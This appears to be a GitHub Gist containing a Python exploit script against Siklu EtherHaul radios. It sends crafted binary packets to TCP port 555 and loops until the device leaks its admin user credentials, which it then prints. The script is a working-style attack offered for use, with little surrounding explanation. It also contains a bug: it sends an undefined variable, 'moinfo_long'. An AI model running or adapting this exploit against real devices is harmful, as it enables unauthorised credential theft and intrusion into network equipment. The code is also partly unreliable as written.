Last active
November 15, 2019 15:51
-
-
Save ianling/c06636fba1b294393f0d3b7df082aa91 to your computer and use it in GitHub Desktop.
Siklu EtherHaul Show Password Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import socket | |
from time import sleep | |
address = '192.168.1.11' # the target | |
port = 555 | |
# set up binary strings to send to the radio | |
root = bytearray(b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xad\x00\x00\x00\x00\x72\x6f\x6f\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00') | |
moinfo = bytearray(b'\x6d\x6f\x2d\x69\x6e\x66\x6f\x20\x73\x79\x73\x74\x65\x6d\x20\x3b\x20\x6e\x74\x70\x20\x3b\x20\x69\x70\x20\x3b\x20\x69\x70\x76\x36\x20\x3b\x20\x65\x74\x68\x20\x3b\x20\x61\x61\x61\x2d\x73\x65\x72\x76\x65\x72\x20\x3b\x20\x61\x61\x61\x20\x3b\x20\x73\x6e\x6d\x70\x2d\x6d\x6e\x67\x20\x3b\x20\x73\x6e\x6d\x70\x2d\x61\x67\x65\x6e\x74\x20\x3b\x20\x73\x79\x73\x6c\x6f\x67\x20\x3b\x20\x72\x6f\x75\x74\x65\x20\x3b\x20\x72\x6f\x75\x74\x65\x36\x20\x3b\x20\x70\x61\x73\x73\x77\x6f\x72\x64\x2d\x73\x74\x72\x65\x6e\x67\x74\x68\x20\x3b\x20\x75\x73\x65\x72\x20\x3b\x20\x61\x72\x70\x20\x3b\x20\x72\x6f\x6c\x6c\x62\x61\x63\x6b\x20\x3b\x20\x6c\x6c\x64\x70\x20\x3b\x20\x6c\x6c\x64\x70\x2d\x72\x65\x6d\x6f\x74\x65\x00') | |
running = 1 | |
while(running): # run repeatedly until it gives the password | |
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
s.connect((address, port)) | |
s.send(root) # send 'root' | |
s.send(moinfo_long) # send 'mo-info system ; ...' | |
sleep(4) # wait 4 seconds for a response | |
data = s.recv(9192) | |
if 'user admin' not in data: # see if we got user credential in the response | |
sleep(4) # wait 4 more seconds | |
data = s.recv(9192) | |
if 'user admin' not in data: # check again | |
print "Didn't get user info, closing socket and trying again" | |
s.close() | |
continue | |
print data # print user data | |
s.close() | |
running = 0 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Python 3